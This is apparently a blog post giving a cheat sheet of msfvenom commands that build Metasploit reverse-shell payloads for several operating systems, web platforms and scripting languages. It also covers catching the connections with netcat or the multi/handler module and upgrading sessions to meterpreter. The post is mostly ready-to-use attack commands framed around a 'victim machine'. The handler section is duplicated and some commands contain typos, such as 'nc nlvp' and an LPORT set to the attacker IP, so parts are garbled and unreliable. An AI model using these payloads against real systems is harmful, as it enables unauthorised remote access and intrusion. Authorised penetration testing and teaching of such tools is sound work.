Generating Metasploit Payloads : Creating Metasploit Reverse Shell
Generating Metasploit Payloads : Creating Metasploit Reverse Shell
Generating Metasploit Payloads : Creating Metasploit Reverse Shell
Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.
These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler
Mention payloads require certain inputs as an option such as LHOST, LPORT.
Operating System Based Bionaries Shell
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho
Web Payloads : Usually For RFI, SQL Injection
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.php
Open the shell.php file in a text editor and remove the "#" will be present in starting position of this file.
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerip -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f war > shell.war
Script Based Payloads:
Python
msfvenom -p cmd/unix/reverse_python LHOST=attackerip LPORT=attackerport -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=attackerport -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=attackerip LPORT=attackerport -f raw > shell.pl
Shellcode
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Simple TCP Reverse Shell
Simple TCP Reverse Shell
Windows
windows/shell_reverse_tcp
windows/x86/shell_reverse_tcp
windows/shell_reverse_tcp
windows/x86/shell_reverse_tcp
Linux
linux/shell_reverse_tcp
Mac
osx/x64/shell_reverse_tcp
osx/x86/shell_reverse_tcp
Handling The Reverse/Bind Connection
You can handle those reverse connection using Netcat and Metasploit Multi Handler Module.
Netcat : Use this command on your attacking machine : nc nlvp <attackerport>
Metasploit : In metasploit follow below steps to handle those reverse connection
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit (This will prompt you the reverse just after executing the shell)
exploit -j (This will background the shell immedietly after receiving the reverse shell)
Note - Some time, you will not get the meterpreter reverse shell or the shell will be die
immediately due to various reasons. In this case first you can try to simple windows shell
(shell_reverse_tcp)
use exploit/multi/handler
set PAYLOAD <set payload windows/shell_reverse_tcp>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit -j
exploit -j (This will background the shell immediately after receiving the reverse
shell, After getting background you can interact with it by command session -i <sessionnumber>)
Now use this command to upgrade the simple reverse tcp shell into meterpreter reverse shell
sesssions -i <numberofsession> -u
linux/shell_reverse_tcp
Mac
osx/x64/shell_reverse_tcp
osx/x86/shell_reverse_tcp
Handling The Reverse/Bind Connection
You can handle those reverse connection using Netcat and Metasploit Multi Handler Module.
Netcat : Use this command on your attacking machine : nc nlvp <attackerport>
Metasploit : In metasploit follow below steps to handle those reverse connection
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <AttackerIp> set LPORT <AttackerPort>
exploit (This will prompt you the reverse just after executing the shell)
exploit -j (This will background the shell immedietly after receiving the reverse shell)
Note - Some time, you will not get the meterpreter reverse shell or the shell will be die
immediately due to various reasons. In this case first you can try to simple windows shell
(shell_reverse_tcp)
use exploit/multi/handler
set PAYLOAD <set payload windows/shell_reverse_tcp>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit -j
exploit -j (This will background the shell immediately after receiving the reverse
shell, After getting background you can interact with it by command session -i <sessionnumber>)
Now use this command to upgrade the simple reverse tcp shell into meterpreter reverse shell
sesssions -i <numberofsession> -u
Comments
Post a Comment